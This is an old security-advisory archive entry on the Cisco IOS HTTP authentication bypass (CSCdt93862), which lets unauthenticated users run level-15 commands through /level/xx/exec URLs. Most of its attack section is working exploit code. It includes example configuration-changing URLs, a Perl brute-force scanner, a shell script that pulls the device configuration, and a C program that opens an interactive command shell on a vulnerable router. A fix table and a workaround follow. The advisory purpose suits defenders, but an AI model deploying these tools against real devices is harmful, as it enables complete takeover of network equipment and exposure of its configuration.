COMMAND
CISCO
SYSTEMS AFFECTED
Cisco IOS 11.3 and later
PROBLEM
Following is based on a Cisco Security Advisory. When HTTP
server is enabled and local authorization is used, it is possible,
under some circumstances, to bypass the authentication and execute
any command on the device. It that case, the user will be able to
exercise complete control over the device. All commands will be
executed with the highest privilege (level 15).
All releases of Cisco IOS software, starting with the release 11.3
and later, are vulnerable. Virtually, all mainstream Cisco
routers and switches running Cisco IOS are affected by this
vulnerability.
By sending a crafted URL it is possible to bypass authentication
and execute any command on the router at level 15 (enable level,
the most privileged level). This will happen only if the user is
using a local database for authentication (usernames and passwords
are defined on the device itself). The same URL will not be
effective against every Cisco IOS software release and hardware
combination. However, there are only 84 different combinations
to try, so it would be easy for an attacker to test them all in a
short period of time. The URL in question folows this format:
http://<device_addres>/level/xx/exec/....
Where xx is a number between 16 and 99. This vulnerability is
documented as Cisco Bug ID CSCdt93862.
An attacker can exercise complete control over the device. By
exploiting this vulnerability, the attacker can see and change
configuration of the device.
You can also run configuration commands:
http://169.254.0.15/level/42/configure/-/banner/motd/LINE
Start with http://169.254.0.16/level/xx/configure and go from
there. A malicious user could use:
http://169.254.0.15/level/42/exec/show%20conf
to get, for instance, vty 0 4 acl information and then add an ACL
for his/her source ip.
This vulnerability has been reported to us independently by David
Hyams, Ernst & Young, Switzerland and by Bashis.
Tamer Sahin wrote MS based exploit cisco ios http vulnerability:
http://www.tamersahin.net/downloads/cisco_ios.zip
Ertan Kurt provided a working code below:
#!/usr/bin/perl
# modified roelof's uni.pl
# to check cisco ios http auth bug
# cronos <cronos@olympos.org>
use Socket;
print "enter IP (x.x.x.x): ";
$host= <STDIN>;
chop($host);
$i=16;
$port=80;
$target = inet_aton($host);
$flag=0;
LINE: while ($i<100) {
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
}
if ($flag==1){print "Not Vulnerable with $i\n\r";}
else {print "$line Vulnerable with $i\n\r"; last LINE; }
$i++;
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
}
This is a little cleaner than that perl script above:
#!/bin/sh
#=============================================================================
# $Id: ios-http-auth.sh,v 1.1 2001/06/29 00:59:44 root Exp root $
#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#=============================================================================
TARGET=192.168.10.20
FETCH="/usr/bin/fetch"
LEVEL=16 # Start Level
EXPLOITABLE=0 # Counter
while [ $LEVEL -lt 100 ]; do
CMD="${FETCH} http://${TARGET}/level/${LEVEL}/exec/show/config"
echo; echo ${CMD}
if (${CMD}) then
EXPLOITABLE=`expr ${EXPLOITABLE} + 1`
fi
LEVEL=`expr $LEVEL + 1`
done;
echo; echo All done
echo "${EXPLOITABLE} exploitable levels"
Eliel Sardanons added following:
/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
* to compile:
* bash# gcc -o cisco cisco.c
*/
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_PORT 80
#define PROMPT "\ncisco$ "
int usage (char *progname) {
printf ("Usage:\n\t%s server\n", progname);
exit(-1);
}
int main (int argc, char *argv[]) {
struct hostent *he;
struct sockaddr_in sin;
int sck, i=0, number=0;
char command[256], buffer[512];
if (argc < 2)
usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("host()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(HTTP_PORT);
sin.sin_addr = *((struct in_addr *)he->h_addr);
printf ("Checking Numbers /level/xx/exec\n");
i=15;
while (1) {
i++;
if (i > 99) {
printf ("Server not vulnerable\n");
exit(-1);
}
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
perror("socket()");
exit(-1);
}
if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
perror ("connect()");
exit(-1);
}
sprintf (buffer, "GET /level/%d/exec HTTP/1.0\r\n\r\n");
write (sck, buffer, strlen(buffer));
memset (buffer, 0, sizeof(buffer));
read (sck, buffer, sizeof(buffer));
if ((strstr(buffer, "Unauthorized")) == 0 && strlen(buffer) > 5)
break;
}
number = i;
printf ("Found: %d\n", number);
while (1) {
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
perror("socket()");
exit(-1);
}
if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
perror ("connect()");
exit(-1);
}
printf (PROMPT);
fgets (command, 256, stdin);
if (strlen(command) == 1)
break;
for (i=0;i<strlen(command);i++) {
if (command[i] == ' ')
command[i] = '/';
}
snprintf (buffer, sizeof(buffer),
"GET /level/%d/exec/%s HTTP/1.0\r\n\r\n", number, command);
write (sck, buffer, strlen(buffer));
memset (buffer, 0, sizeof(buffer));
while ((read (sck, buffer, sizeof(buffer))) != 0) {
if ((strstr(buffer, "CR</A>")) != 0) {
printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
memset (buffer, 0, sizeof(buffer));
break;
} else if ((strstr(buffer, "Unauthorized")) != 0) {
printf ("Server not vulnerable\n");
exit(-1);
} else {
printf ("%s", buffer);
memset (buffer, 0, sizeof(buffer));
}
}
}
printf ("Thanks...\n");
exit(0);
}
SOLUTION
The workaround for this vulnerability is to disable HTTP server
on the router or to use Terminal Access Controller Access Control
System (TACACS+) or Radius for authentication. Fixes are in
table.
+---------------+----------------+-----------------------------------------+
| | Description of | |
| Train | Image or | Availability of Fixed Releases* |
| | Platform | |
+---------------+----------------+-------------+------------+--------------+
|11.0-based Releases and Earlier | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |Multiple | |
| 10.3 |releases and |Not affected |
| |platforms | |
+---------------+----------------+-----------------------------------------+
| |Multiple | |
| 11.0 |releases and |Not affected |
| |platforms | |
+---------------+----------------+-------------+------------+--------------+
| 11.1-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |Major release | |
| 11.1 |for all |Not affected |
| |platforms | |
+---------------+----------------+-------------+------------+--------------+
| 11.2-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |Major release |End of Engineering |
| 11.2 |for all +-----------------------------------------+
| |platforms |Not affected |
+---------------+----------------+-------------+------------+--------------+
| 11.3-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |Major release |End of Engineering |
| 11.3 |for all +-----------------------------------------+
| |platforms |Upgrade recommended to 12.0(18) |
+---------------+----------------+-----------------------------------------+
| |ED for dial | |
| |platforms and |Not Scheduled |
| 11.3AA |access servers +-----------------------------------------+
| |5800, 5200, |Upgrade recommended to 12.1(9) |
| |5300, 7200 | |
+---------------+----------------+-----------------------------------------+
| |Early deployment|End of Engineering |
| 11.3DA |train for ISP | |
| |DSLAM 6200 +-----------------------------------------+
| |platform |Upgrade recommended to 12.1DA |
+---------------+----------------+-----------------------------------------+
| |Early deployment| |
| |train for |End of Engineering |
| |ISP/Telco/PTT | |
| 11.3DB |xDSL broadband +-----------------------------------------+
| |concentrator | |
| |platform, (NRP) |Upgrade recommended to 12.1DB |
| |for 6400 | |
+---------------+----------------+-----------------------------------------+
| |Short-lived ED |End of Engineering |
| 11.3HA |release for ISR | |
| |3300 (SONET/SDH +-----------------------------------------+
| |router) |Upgrade recommended to 12.0(18) |
+---------------+----------------+-----------------------------------------+
| |MC3810 |End of Engineering |
| 11.3MA |functionality +-----------------------------------------+
| |only |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Voice over IP, | |
| |media |End of Engineering |
| 11.3NA |convergence, +-----------------------------------------+
| |various |Upgrade recommended to 12.1(9) |
| |platforms | |
+---------------+----------------+-----------------------------------------+
| |Early deployment|End of Engineering |
| 11.3T |major release, | |
| |feature-rich for+-----------------------------------------+
| |early adopters |Upgrade recommended to 12.0(18) |
+---------------+----------------+-----------------------------------------+
| | |End of Engineering |
| 11.3XA |Introduction of +-----------------------------------------+
| |ubr7246 and 2600|Upgrade recommended to 12.0(18) |
+---------------+----------------+-----------------------------------------+
| | |End of Engineering |
| 11.3WA4 |LightStream 1010+-----------------------------------------+
| | |Upgrade to be determined |
+---------------+----------------+-------------+------------+--------------+
| 12.0-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |General | | | |
| 12.0 |Deployment | | |12.0(18) |
| |release for all | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| | |Not Scheduled |
| 12.0DA |xDSL support +-----------------------------------------+
| |6100, 6200 |Upgrade recommended to 12.1(7)DA2 |
+---------------+----------------+-----------------------------------------+
| |Early Deployment| |
| |(ED) release, | |
| |which delivers |Not Scheduled |
| |support for the | |
| 12.0DB |Cisco 6400 +-----------------------------------------+
| |Universal Access| |
| |Concentrator | |
| |(UAC) for Node |Upgrade recommended to 12.1(5)DB2 |
| |Switch Processor| |
| |(NSP). | |
+---------------+----------------+-----------------------------------------+
| |Early Deployment| |
| |(ED) release, | |
| |which delivers |Not Scheduled |
| |support for the | |
| 12.0DC |Cisco 6400 +-----------------------------------------+
| |Universal Access| |
| |Concentrator | |
| |(UAC) for Node |Upgrade recommended to 12.1DC |
| |Switch Processor| |
| |(NSP). | |
+---------------+----------------+-------------+------------+--------------+
| |Core/ISP | | |12.0(18)S |
| 12.0S |support GSR, | | |Available |
| |RSP, c7200 | | |2001-July |
+---------------+----------------+-------------+------------+--------------+
| 12.0SC |Cable/broadband | | |12.0(16)SC |
| |ISP ubr7200 | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.0SL |10000 ESR c10k | | | |
+---------------+----------------+-------------+------------+--------------+
| |Cisco IOS | | | |
| |software | | | |
| |Release12.0ST is| | | |
| |an early | | | |
| |deployment (ED) | | | |
| |release for the | | | |
| 12.0ST |Cisco 7200, | | | |
| |7500/7000RSP and| | | |
| |12000 (GSR) | | | |
| |series routers | | | |
| |for Service | | | |
| |Providers | | | |
| |(ISPs). | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early | |
| |Deployment(ED) |Not Scheduled |
| 12.0T |VPN, Distributed| |
| |Director, +-----------------------------------------+
| |various |Upgrade recommended to 12.1(9) |
| |platforms | |
+---------------+----------------+-----------------------------------------+
| |Catalyst | |
| |switches | |
| |cat8510c, | |
|12.0(13)W5(19c)|cat8540c, c6msm,|Not vulnerable |
| |ls1010, | |
| |cat8510m, | |
| |cat8540m | |
+---------------+----------------+-------------+------------+--------------+
| |Catalyst | | | |
|12.0(10)W5(18g)|switches | | |12.0(18)W5(22a)
| |cat2948g, | | |2001-August-23|
| |cat4232 | | | |
+---------------+----------------+-------------+------------+--------------+
| |Catalyst | | | |
|12.0(14)W5(20) |switches | | |12.0(18)W5(22)|
| |cat5000ATM | | |2001-August-03|
+---------------+----------------+-------------+------------+--------------+
| | |Not Scheduled |
| 12.0WC | +-----------------------------------------+
| | |Upgrade to be determined |
+---------------+----------------+-----------------------------------------+
| | |Not Scheduled |
| 12.0WT |cat4840g +-----------------------------------------+
| | |Upgrade to be determined |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XA |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Short-lived |Not Scheduled |
| 12.0XB |early deployment+-----------------------------------------+
| |release |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XC |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XD |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XE |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(8a)E |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XF |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XG |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XH |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XI |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XJ |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0(5)XK |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0(7)XK |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2 |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XL |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XM |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.0(4)XM1 |
| | |Availability date to be determined |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XN |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XP |(ED) limited +-----------------------------------------+
| |platforms |Upgrade to be determined |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XQ |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(9) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XR |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|End of Engineering |
| 12.0XS |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(8a)E |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XU |(ED) limited +-----------------------------------------+
| |platforms |Upgrade to be determined |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.0XV |(ED) limited +-----------------------------------------+
| |platforms |Upgrade to be determined |
+---------------+----------------+-------------+------------+--------------+
| 12.1-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |General | | | |
| 12.1 |deployment | | |12.1(9) |
| |release for all | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.1AA |Dial support | | | |
+---------------+----------------+-------------+------------+--------------+
| |Core/ISP | | | |
| 12.1CX |support GSR, | | | |
| |RSP, c7200 | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.1DA |xDSL support |12.1(7)DA2 | | |
| |6100, 6200 |2001-Jun-18 | | |
+---------------+----------------+-------------+------------+--------------+
| |Cisco IOS | | | |
| |Software Release| | | |
| |12.1(1)DB | | | |
| 12.1DB |supports Cisco's| | | |
| |6400 Universal | | | |
| |Access | | | |
| |Concentrator | | | |
+---------------+----------------+-------------+------------+--------------+
| |Cisco IOS | | | |
| |Software Release| | | |
| |12.1(1)DC | | | |
| 12.1DC |supports Cisco's| | | |
| |6400 Universal | | | |
| |Access | | | |
| |Concentrator | | | |
+---------------+----------------+-------------+------------+--------------+
| |Core/ISP | | | |
| 12.1E |support GSR, | | |12.1(8a)E |
| |RSP, c7200 | | |2001-Jul-09 |
+---------------+----------------+-------------+------------+--------------+
| |12.1EC is being | | | |
| |offered to allow| | | |
| |early support of| | | |
| |new features on | | | |
| |the uBR7200 | | | |
| 12.1EC |platform, as | |12.1(6.5)EC3| |
| |well as future | | | |
| |support for new | | | |
| |Universal | | | |
| |Broadband Router| | | |
| |headend | | | |
| |platforms. | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.1EX |Catalyst 6000 | | |12.1(8a)E |
| |support | | |2001-Jul-09 |
+---------------+----------------+-------------+------------+--------------+
| |Cat8510c, | | | |
| 12.1EY |Cat8510m, | | |12.1(6)EY |
| |Cat8540c, | | | |
| |Cat8540m, LS1010| | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1EZ |(ED) special |12.1(6)EZ1 | | |
| |image | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early | |
| |Deployment(ED) |Not Scheduled |
| 12.1T |VPN, Distributed| |
| |Director, +-----------------------------------------+
| |various |Upgrade recommended to 12.2(1b) |
| |platforms | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XA |(ED) limited | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XB |(ED) limited | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XC |(ED) limited | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment|Not Scheduled |
| 12.1XD |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XE |(ED) limited | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XF |(ED) 811 and |12.1(2)XF4 | | |
| |813 (c800 |2001-July-09 | | |
| |images) | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XG |(ED) 800, 805, |12.1(5)XG5 | | |
| |820, and 1600 |2001-July-09 | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment|Not Scheduled |
| 12.1XH |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.1XI |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-----------------------------------------+
| |Early Deployment|Not Scheduled |
| 12.1XJ |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.1(5)YB4 |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XK |(ED) limited | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment|Not Scheduled |
| 12.1XL |(ED) limited +-----------------------------------------+
| |platforms |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XM |early deployment|12.1(4)XM4 | | |
| |release |2001-June-27 | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XP |(ED) 1700 and |12.1(3)XP4 | | |
| |SOHO | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived |Not Scheduled |
| 12.1XQ |early deployment+-----------------------------------------+
| |release |Upgrade recommended to 12.2(1b) |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XR |early deployment|12.1(5)XR2 | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XS |early deployment| | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XT |(ED) 1700 |12.1(3)XT3 | | |
| |series | | | |
+---------------+----------------+-------------+------------+--------------+
| |Early Deployment| | | |
| 12.1XU |(ED) limited |12.1(5)XU1 | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XV |early deployment|12.1(5)XV3 | | |
| |release |2001-July | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived |Not Scheduled |
| 12.1XW |early deployment+-----------------------------------------+
| |release |Upgrade recommended to 12.2DD |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XX |early deployment| | |12.1(6)EZ |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XY |early deployment|12.1(5)XY6 | | |
| |release |2001-July | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1XZ |early deployment|12.1(5)XZ4 | | |
| |release |2001-July | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1YA |early deployment| | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1YB |early deployment|12.1(5)YB4 | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1YC |early deployment|12.1(5)YC1 | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1YD |early deployment|12.1(5)YD2 | | |
| |release |2001-June-25 | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.1YF |early deployment|12.1(5)YF2 | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.2-based Releases | Rebuild | Interim** | Maintenance |
+---------------+----------------+-------------+------------+--------------+
| |General | | | |
| 12.2 |deployment |12.2(1b) |12.2(1.1) |12.2(3) |
| |release for all | | |2001-August |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| |General | | | |
| 12.2T |deployment | |12.2(2.2)T | |
| |release for all | | | |
| |platforms | | | |
+---------------+----------------+-------------+------------+--------------+
| 12.2XA |SPLOB | | |12.2(2)XA |
| | | | |2001-July-02 |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.2XD |early deployment|12.2(1)XD1 | | |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.2XE |early deployment| | |12.2(1)XE |
| |release | | | |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.2XH |early deployment| | |12.2(1)XH |
| |release | | |2001-June-25 |
+---------------+----------------+-------------+------------+--------------+
| |Short-lived | | | |
| 12.2XQ |early deployment| | |12.2(1)XQ |
| |release | | |2001-June-23 |
+---------------+----------------+-------------+------------+--------------+
| Notes |
+--------------------------------------------------------------------------+
| * All dates are estimated and subject to change. |
| |
| ** Interim releases are subjected to less rigorous testing than regular |
| maintenance releases, and may have serious bugs. |
+--------------------------------------------------------------------------+